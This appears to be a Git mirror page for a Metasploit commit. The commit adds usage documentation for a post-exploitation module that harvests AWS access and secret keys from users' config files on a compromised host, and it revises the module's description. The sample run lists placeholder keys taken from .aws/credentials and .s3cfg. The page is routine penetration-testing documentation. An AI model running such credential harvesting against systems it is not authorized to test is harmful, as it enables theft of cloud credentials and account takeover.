infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add aws_keys docs; correct description

bug/bundler_fix
Jon Hart 2016-10-28 15:27:47 -07:00
parent 7dea613507
commit 96c204d1ea
No known key found for this signature in database
GPG Key ID: 2FA9F0A3AFA8E9D3
2 changed files with 59 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

56
documentation/modules/post/multi/gather/aws_keys.rb Normal file
View File

@ -0,0 +1,56 @@
## Vulnerable Application
Any system with a `shell` or `meterpreter` session.
## Verification Steps
1. Get a `shell` or `meterpreter` session on some host.
2. Do: ```use post/multi/gather/aws_keys.rb```
3. Do: ```set SESSION [SESSION_ID]```, replacing ```[SESSION_ID]``` with the session number you wish to run this one.
4. Do: ```run```
5. If the system has readable configuration files containing AWS key material, they will be printed out.
## Options
None.
## Scenarios
```
msf post(aws_keys) > run
[*] Enumerating possible user AWS config files
[*] Looking for AWS config/credentials files in /bin
[*] Looking for AWS config/credentials files in /dev
[*] Looking for AWS config/credentials files in /home/syslog
[*] Looking for AWS config/credentials files in /home/test
[*] Looking for AWS config/credentials files in /home/test ubuntu
[*] Looking for AWS config/credentials files in /home/ubuntu
[*] Looking for AWS config/credentials files in /nonexistent
[*] Looking for AWS config/credentials files in /root
[*] Looking for AWS config/credentials files in /usr/games
[*] Looking for AWS config/credentials files in /usr/sbin
[*] Looking for AWS config/credentials files in /var/backups
[*] Looking for AWS config/credentials files in /var/cache/man
[*] Looking for AWS config/credentials files in /var/cache/pollinate
[*] Looking for AWS config/credentials files in /var/lib/gnats
[*] Looking for AWS config/credentials files in /var/lib/landscape
[*] Looking for AWS config/credentials files in /var/lib/libuuid
[*] Looking for AWS config/credentials files in /var/list
[*] Looking for AWS config/credentials files in /var/mail
[*] Looking for AWS config/credentials files in /var/run/dbus
[*] Looking for AWS config/credentials files in /var/run/ircd
[*] Looking for AWS config/credentials files in /var/run/sshd
[*] Looking for AWS config/credentials files in /var/spool/lpd
[*] Looking for AWS config/credentials files in /var/spool/news
[*] Looking for AWS config/credentials files in /var/spool/uucp
[*] Looking for AWS config/credentials files in /var/www
AWS Key Data
============
Source AWS_ACCESS_KEY_ID AWS_SECRET_ACCESS_KEY Profile
------ ----------------- --------------------- -------
/home/test/.aws/credentials BAR PRIVATE_TEST test
/home/ubuntu/.aws/credentials ABC456 PRIVATE_TEST test
/root/.s3cfg root_key root_secret default
```

4
modules/post/multi/gather/aws_keys.rb
View File

@ -20,7 +20,9 @@ class MetasploitModule < Msf::Post
info,
'Name' => 'UNIX Gather AWS Keys',
'Description' => %q(
This module will attempt to read AWS configuration files (.aws/config, .aws//credentials and .s3cfg)
This module will attempt to read AWS configuration files
(.aws/config, .aws//credentials and .s3cfg) for users discovered
on the session'd system and extract AWS keys from within.
),
'License' => MSF_LICENSE,
'Author' => [ 'Jon Hart <jon_hart[at]rapid7.com>' ],